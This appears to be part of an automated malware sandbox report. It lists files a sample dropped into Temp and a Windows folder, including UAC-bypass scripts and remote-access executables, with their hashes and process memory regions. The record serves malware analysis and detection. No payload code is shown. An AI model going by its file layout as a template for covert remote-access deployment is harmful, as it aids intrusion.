C:\Users\Admin\AppData\Local\Temp\hide.exe
Filesize
819KB

MD5
72cc4ab6ee23c79bbeed4c4d7b31f741

SHA1
a5598acb794ebbbad6c0819c20f6f7ed99541e89

SHA256
5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73

SHA512
4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nouac.cmd
Filesize
10KB

MD5
7050a3b6745999edb2eeeacfc2a580ba

SHA1
f452f8e96bf51887910416452ae0f8c7b5d39a00

SHA256
abc449be609cbc0ae99649f4c4eb06380aa9467dc243346b3fa17e61104eec94

SHA512
8c888de3a77ecde92a172c4314d91cfb9cefd215397bdded3e448190f5c1de9d7e38a94e581c8e5c0527516a2fc0697e78828773d3ef834bfde41085745d24d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.cmd
Filesize
10KB

MD5
c4c7b84f53ad6a9801818d1dfe71dce8

SHA1
82de045aacf84825cd301be26a941c2fb2eea36b

SHA256
fc612fa3869d2c4ab22a1bb500e405c4318ee4fed16e2da28974f3aa97bab844

SHA512
1fef234ae4e5255d93670cf5794c7e032d623f101699dcffa4bd26b9e7411679d544afec8f05762a5e96134a10efe9ff41e75edab9607ed5288851332ce37e97

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8decoder.dll
Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8encoder.dll
Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmmux.dll
Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisdecoder.dll
Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisencoder.dll
Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
C:\Windows\spom\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\vp8decoder.dll
Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Windows\spom\vp8encoder.dll
Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Windows\spom\webmmux.dll
Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Windows\spom\webmvorbisdecoder.dll
Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Windows\spom\webmvorbisencoder.dll
Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
memory/308-141-0x0000000000000000-mapping.dmp

Download
memory/532-188-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/532-179-0x0000000000000000-mapping.dmp

Download
memory/532-183-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1044-145-0x0000000000000000-mapping.dmp

Download
memory/1112-180-0x0000000000000000-mapping.dmp

Download
memory/1112-189-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1112-184-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1376-133-0x0000000000000000-mapping.dmp

Download
memory/1420-147-0x0000000000000000-mapping.dmp

Download
memory/1500-132-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1500-137-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1748-167-0x0000000000000000-mapping.dmp

Download
memory/1820-143-0x0000000000000000-mapping.dmp

Download
memory/2112-136-0x0000000000000000-mapping.dmp

Download
memory/2248-165-0x0000000000000000-mapping.dmp

Download
memory/2292-169-0x0000000000000000-mapping.dmp

Download
memory/2656-168-0x0000000000000000-mapping.dmp

Download
memory/2888-144-0x0000000000000000-mapping.dmp

Download
memory/3196-163-0x0000000000000000-mapping.dmp

Download
memory/3432-185-0x0000000000000000-mapping.dmp

Download
memory/3432-187-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/3476-158-0x0000000000000000-mapping.dmp

Download
memory/4040-142-0x0000000000000000-mapping.dmp

Download
memory/4208-164-0x0000000000000000-mapping.dmp

Download
memory/4244-166-0x0000000000000000-mapping.dmp

Download
memory/4348-170-0x0000000000000000-mapping.dmp

Download
memory/4404-161-0x0000000000000000-mapping.dmp

Download
memory/4532-139-0x0000000000000000-mapping.dmp

Download
memory/4612-148-0x0000000000000000-mapping.dmp

Download
memory/5036-146-0x0000000000000000-mapping.dmp

Download